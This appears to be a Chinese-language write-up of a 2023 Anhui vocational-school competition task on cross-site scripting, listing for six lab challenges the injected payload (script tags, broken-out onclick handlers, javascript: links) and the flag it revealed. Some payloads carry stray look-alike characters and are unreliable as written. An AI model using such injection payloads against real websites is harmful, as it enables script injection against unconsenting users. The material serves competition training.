当前位置: 首页 > article >正文

2023年安徽省中职网络安全跨站脚本攻击

B-4:跨站脚本攻击

任务环境说明:

√ 服务器场景:Server2125(关闭链接)

√ 服务器场景操作系统:未知

√ 用户名:未知 密码:未知

1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;
 

通过尝试知道这里存在xss漏洞

?name=<script>alert(1)</script>

flag{luKOh/C9obMtoJUtHD37Zg}

2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><script>alert(1)</script>

flag{199bZN8Rge8dYtZGoTqoYA}

3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

通过两段代码的不同我们可以知道’在里面的重要性

‘οnclick=’javascript:alert(1)

flag{wO+8fB5yu3KCdNq5V7Uo5g}

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“οnclick=’javascript:alert(1)’

flag{0XRMADSrrZh7Ptv1VS9/zw}

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><a href=javascript(1)>

flag{Si3Czm1JYclcYp4KklGM3A}

6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

"><a Href=javascript(1)>

flag{Mki8dUfOl7Khl7KgbPcoPQ}

 


http://www.kler.cn/a/1489.html

相关文章:

  • socket网络编程-TC/IP方式
  • IvorySQL 升级指南:从 3.x 到 4.0 的平滑过渡
  • spring boot 集成 knife4j
  • IT面试求职系列主题-Jenkins
  • 根据docker file 编译镜像
  • 【 算法设计与分析-回顾算法知识点】福建师范大学数学与计算机科学学院 2006 — 2007学年第二学期考试 A 卷
  • Lambda表达式
  • 2023年华为HCIE-Datacom认证(H12-891、H12-892)
  • Java ~ Reference【总结】
  • 面试官:MQ的好处到底有哪些?
  • 使用<style scoped>导致的样式问题
  • Shader基础
  • http,web问题总汇
  • 好不容易约来了一位程序员来面试,结果人家不做笔试题
  • 最快方法求最长上升子序列(LIS)+最长公共子序列(LCS)模板(C/C++)
  • 【Pytorch】Tensor的分块、变形、排序、极值与in-place操作
  • 【Java】面向对象三大基本特征
  • docker版jxTMS使用指南
  • 【MySQL】数据类型
  • EEPROM芯片(24c02)使用详解(I2C通信时序分析、操作源码分析、原理图分析)
  • 【LeetCode】1609. 奇偶树、1122. 数组的相对排序
  • 【C语言进阶】内存函数
  • Linux IPC:管道符的实现
  • 数据大放送之历史影像下载
  • SpringCloud微服务技术栈.黑马跟学(三)
  • Python04 数据序列-字符串